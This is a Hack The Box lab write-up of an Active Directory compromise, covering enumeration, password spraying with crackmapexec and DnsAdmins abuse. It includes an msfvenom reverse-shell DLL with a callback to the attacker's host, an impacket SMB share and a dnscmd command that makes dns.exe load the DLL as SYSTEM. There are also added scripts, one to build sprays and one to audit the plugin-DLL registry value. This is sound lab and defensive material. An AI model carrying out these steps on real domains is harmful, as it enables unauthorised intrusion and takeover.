Summary
Enumerating the domain controller with enum4linux (SMB, RPC and LDAP) gives us a list of domain users
While reviewing the user details pulled over LDAP, one account turned out to have a plaintext password in its attributes
Spraying that password across every enumerated account gives us access as user Melanie
While enumerating the box as Melanie we find credentials for Ryan in the PowerShell transcript logs
Ryan has DnsAdmins permissions, which let us point the DNS service at an attacker-controlled DLL (a "server level plugin DLL") that dns.exe loads every time the service starts
Because the DNS service runs as SYSTEM, restarting it executes our DLL and we get a shell as NT AUTHORITY\SYSTEM
Tools/Blogs used
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
msfvenom
smbserver
crackmapexec
windapsearch
enum4linux
Lessons learned
I missed a plaintext password while "skimming" the enum4linux report
Went down a long rabbit hole as user Ryan, exploring many possibilities
Not calling smbserver.py properly, with the share name and directory arguments it expects, cost me a lot of time backtracking
Recon - Portscan
Starting with a basic nmap scan we receive a wide range of open ports, typical of a domain controller, that will require a lot of upfront enumeration.
User account list
Using enum4linux, we enumerated the SMB shares, the RPC endpoints and the LDAP service to acquire a list of usernames. The same report also contained the plaintext password for user Marko, stored in an LDAP attribute of his account, which we initially overlooked.
LDAP enumeration
I made a mistake here and completely missed a plaintext password while skimming the enum4linux results. enum4linux is primarily an SMB/RPC enumeration tool, but it pulls account descriptions along with the user list, and that is exactly the field the password was sitting in.
Along the way I also learned about a new LDAP enumeration tool. Historically I had used ldapsearch and typed out every query by hand. Windapsearch was an epic find, not only for me but for anyone who has been sending custom ldapsearch queries, because it automates the most useful queries and their filter syntax.
Windapsearch
Windapsearch is a Python script to help enumerate users, groups and computers from a Windows domain through LDAP queries. By default, Windows Domain Controllers support basic LDAP operations through port 389/tcp. With any valid domain account (regardless of privileges), it is possible to perform LDAP queries against a domain controller for any AD related information.
You can always use a tool like ldapsearch to perform custom LDAP queries against a Domain Controller. I found myself running different LDAP commands over and over again, and it was difficult to memorize all the custom LDAP queries. So this tool was born to help automate some of the most useful LDAP queries a pentester would want to perform in an AD environment.
Password Spraying
A users.txt file was created from the enum4linux report and fed to crackmapexec, a tool that tries a credential against many accounts over SMB (a password spray). Alternatively you could use command line bash fu to make repeated attempts with any other command line tool. Before spraying, check the Password Info section of the enum4linux report for the lockout threshold so that one pass does not lock out every account in the domain. The command used in this case is below; the password is quoted because bash treats a bare trailing ! as history expansion.
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
This gave us a successful login as user Melanie.
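The two steps above (pulling users and the overlooked description password out of the enum4linux report, then building the spray) are worth automating so a password in a description field is never skimmed past again. The script below is an added example and is not code from the original writeup; the enum4linux report it parses is a constructed sample in the shape enum4linux prints (the user:[...] rid:[...] lines, the index: ... Account: ... Desc: ... lines and the Password Info block), with made-up RIDs and descriptions around the account names and password the writeup mentions. The domain name CORP and the crackmapexec --continue-on-success flag are assumptions, not from the page.

```python
import re
import shlex

# Constructed sample in the shape of an enum4linux report (abbreviated; not the
# page's actual output). Account names and the password follow the writeup; the
# domain name, RIDs and descriptions are made up for illustration.
SAMPLE_REPORT = """\
[+] Password Info for Domain: CORP
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Account Lockout Threshold: None
    [+] Locked Account Duration: 30 minutes

index: 0xfb6 RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: (null)\tDesc: Built-in account for administering the computer/domain
index: 0x10a4 RID: 0x456 acb: 0x00000210 Account: marko\tName: (null)\tDesc: Account created. Password set to Welcome123!
index: 0x10a5 RID: 0x457 acb: 0x00000210 Account: melanie\tName: (null)\tDesc: (null)
index: 0x10a6 RID: 0x458 acb: 0x00000210 Account: ryan\tName: (null)\tDesc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[marko] rid:[0x456]
user:[melanie] rid:[0x457]
user:[ryan] rid:[0x458]
"""

USER_LINE = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[0x[0-9a-fA-F]+\]")
DESC_LINE = re.compile(
    r"^index:\s+0x[0-9a-fA-F]+\s+RID:\s+0x[0-9a-fA-F]+\s+acb:\s+0x[0-9a-fA-F]+"
    r"\s+Account:\s+(?P<account>\S+)\s+Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)
# Phrases admins use when they park a password in a description field.
PASSWORD_HINT = re.compile(r"pass(?:word|wd)?\s*(?:set\s+to|is|:|=)\s*(?P<secret>\S+)", re.I)
LOCKOUT_LINE = re.compile(r"Account Lockout Threshold:\s*(?P<value>\S+)")


def parse_users(report):
    """Usernames from the enumdomusers lines, deduplicated, order preserved."""
    users = []
    for line in report.splitlines():
        m = USER_LINE.match(line)
        if m and m.group("name") not in users:
            users.append(m.group("name"))
    return users


def parse_descriptions(report):
    """account -> description text from the querydispinfo lines ("(null)" becomes "")."""
    descs = {}
    for line in report.splitlines():
        m = DESC_LINE.match(line)
        if m:
            desc = m.group("desc").strip()
            descs[m.group("account")] = "" if desc == "(null)" else desc
    return descs


def find_password_hints(report):
    """(account, candidate password) for every description that looks like it holds one."""
    hits = []
    for account, desc in parse_descriptions(report).items():
        m = PASSWORD_HINT.search(desc)
        if m:
            hits.append((account, m.group("secret")))
    return hits


def parse_lockout_threshold(report):
    """Lockout threshold as an int, or None when the domain never locks accounts."""
    m = LOCKOUT_LINE.search(report)
    if not m or m.group("value").lower() == "none":
        return None
    return int(m.group("value"))


def spray_plan(report, attempts_per_user=1):
    """Targets, candidate passwords, and whether a spray round stays under the lockout policy."""
    users = parse_users(report)
    passwords = list(dict.fromkeys(secret for _, secret in find_password_hints(report)))
    threshold = parse_lockout_threshold(report)
    # attempts_per_user bad guesses per account must stay below the threshold.
    safe = threshold is None or attempts_per_user < threshold
    return {"users": users, "passwords": passwords, "lockout_threshold": threshold, "safe": safe}


def build_cme_command(target, users_file, password):
    """One-password spray with crackmapexec; shlex.quote protects metacharacters such as '!'."""
    return (f"crackmapexec smb {target} -u {shlex.quote(users_file)} "
            f"-p {shlex.quote(password)} --continue-on-success")


if __name__ == "__main__":
    plan = spray_plan(SAMPLE_REPORT)
    print("users.txt contents:", "\n".join(plan["users"]), sep="\n")
    print("candidate passwords:", plan["passwords"], "safe to spray:", plan["safe"])
    for password in plan["passwords"]:
        print(build_cme_command("10.10.10.169", "users.txt", password))
```

Run it against a real report with `spray_plan(open("enum4linux.txt").read())`; if the plan comes back with safe set to False, the lockout threshold is lower than the number of guesses you intend per account and the spray needs to be throttled across lockout windows instead.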
User flag
Logging in as Melanie provided us access to the user flag in the usual location on her desktop.
Lateral movement
From here I proceeded to upload winPEAS and Sherlock to enumerate for vulnerabilities. However, after going down many rabbit holes I reviewed the official Hack The Box forum for a nudge, and it was suggested to look for what is hidden. Listing directories with hidden items included (dir /a, or Get-ChildItem -Force in PowerShell) quickly turned up the PSTranscripts logs.
Digging into the transcription logs I made sure to read every line of the output thoroughly and eventually located a plaintext password associated with user Ryan. The transcript logs were located in a hidden directory directly under C:\.
I immediately logged in as Ryan with Evil-WinRM.
Privilege escalation
As user Ryan I initially performed a large amount of enumeration using the usual enumeration scripts. Eventually my team and I decided to dig into the user's group memberships (whoami /groups lists them, including membership inherited through nested groups). Although this was a pretty wide surface area we were able to confirm that an attack against the DNS server was possible. Of course this relies on several assumptions about the environment, such as the DNS service running on a host we can reach and our being able to restart it, but initially nothing suggested we could not go down this route. My teammate had actually ingested enough logs to map out the DnsAdmins risk, and this gave us greater assurance we were on the correct track.
DNS DLL Injection
The attack abuses DnsAdmins permissions to configure a server-level plugin DLL (the ServerLevelPluginDll value under the DNS service's Parameters registry key) that dns.exe loads every time the service starts. We create a weaponized DLL with msfvenom, serve it from an SMB share on our host, and point the domain controller's DNS configuration at that UNC path. Restarting the service loads our DLL and gives us a shell.
We start by creating a payload in DLL format with a callback to our host, using msfvenom and the command below (fill in your own listener port).
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.65 LPORT=<port> -f dll -o rev.dll
The DLL has to be reachable from the DC. We could copy it over with Invoke-WebRequest, curl or wget, but here we host it on an SMB share and let dnscmd reference it directly by UNC path. First we spin up an SMB server with impacket's smbserver.py; "test" is the share name and "." the directory being served (the one containing rev.dll), and -smb2support is needed because current Windows versions no longer speak SMB1.
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support test .
With the share in place we set the plugin DLL with dnscmd.exe.
dnscmd.exe /config /serverlevelplugindll \\10.10.14.65\test\rev.dll
With a netcat listener already waiting on the chosen port, we restart the DNS service with sc.exe stop dns followed by sc.exe start dns. Use sc.exe explicitly: inside PowerShell a bare sc is an alias for Set-Content.
We see the DC connect to our SMB server to fetch the DLL and receive a shell as NT AUTHORITY\SYSTEM on our listener. Afterwards, remove the ServerLevelPluginDll value from HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters and restart DNS once more, otherwise the service keeps trying to load the DLL from our share every time it starts.
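The whole chain hinges on one registry value, so the flip side of the procedure above is checking it: a defender (or a tester cleaning up after themselves) should be able to read the DNS service's Parameters key and decide whether ServerLevelPluginDll is legitimate. The script below is an added example, not code from the writeup or from the ired.team post; the registry key path and value name are the ones the DnsAdmins technique uses, the reg query output it parses is a constructed sample (the EnableGlobalQueryBlockList value is there only to show unrelated values are ignored), and the C:\Windows install location it assumes when expanding %SystemRoot% is an assumption.

```python
import re
from pathlib import PureWindowsPath

DNS_PARAMS_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters"
SYSTEM32 = r"C:\Windows\System32"   # assumed default install location

# Constructed sample of `reg query` output for DNS_PARAMS_KEY after the attack in
# the writeup (not captured from the box); the second value is just noise.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
    ServerLevelPluginDll    REG_SZ    \\10.10.14.65\test\rev.dll
    EnableGlobalQueryBlockList    REG_DWORD    0x1
"""

VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s*(?P<data>.*)$")

# Undo steps for the technique: drop the value, then bounce the service so dns.exe
# stops trying to load the DLL.
CLEANUP = [
    rf"reg delete {DNS_PARAMS_KEY} /v ServerLevelPluginDll /f",
    "sc.exe stop dns",
    "sc.exe start dns",
]


def dnscmd_load_command(attacker_ip, share, dll):
    """The attacker-side step from the writeup, as a string, so the audit can be checked against it."""
    return rf"dnscmd.exe /config /serverlevelplugindll \\{attacker_ip}\{share}\{dll}"


def parse_reg_query(text):
    """name -> (type, data) for every value line in reg query output; the key line is skipped."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group("name")] = (m.group("type"), m.group("data").rstrip())
    return values


def _expand(path):
    # Only the two variables commonly seen in this value; default install assumed.
    return re.sub(r"%(?:systemroot|windir)%", lambda _: "C:\\Windows", path, flags=re.I)


def classify_plugin_dll(path):
    """(verdict, reason) for a ServerLevelPluginDll value, worst cases first."""
    if not path or not path.strip():
        return ("clean", "ServerLevelPluginDll is not set")
    p = _expand(path.strip())
    if p.startswith("\\\\"):
        return ("critical", "UNC path: dns.exe (SYSTEM) will fetch and load a DLL from a remote share")
    wp = PureWindowsPath(p)
    if not wp.drive:
        return ("high", "relative path: resolved at service start from a directory an attacker may control")
    if ".." in wp.parts:
        return ("high", "path traversal: escapes the directory it appears to point at")
    if str(wp).lower().startswith(SYSTEM32.lower() + "\\"):
        return ("review", "DLL under System32: confirm it is a known, signed DNS plugin")
    return ("high", "local DLL outside System32: almost certainly not a legitimate plugin")


def audit(reg_query_output):
    """Classify the configured plugin DLL and return the cleanup steps when it is suspicious."""
    values = parse_reg_query(reg_query_output)
    _, data = values.get("ServerLevelPluginDll", ("REG_SZ", ""))
    verdict, reason = classify_plugin_dll(data)
    return {"path": data, "verdict": verdict, "reason": reason,
            "cleanup": list(CLEANUP) if verdict != "clean" else []}


if __name__ == "__main__":
    result = audit(SAMPLE_REG_QUERY)
    print(f"{result['verdict']}: {result['path']!r} ({result['reason']})")
    for step in result["cleanup"]:
        print("  ", step)
```

On a live DC, feed it the output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters`; anything other than a clean or review verdict means the DNS service has been pointed at a DLL nobody should trust, and the returned cleanup list is the sequence to run before the next service restart executes it again.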
Root.txt
With our reverse connection as NT AUTHORITY\SYSTEM we grab the root flag and call it a day :)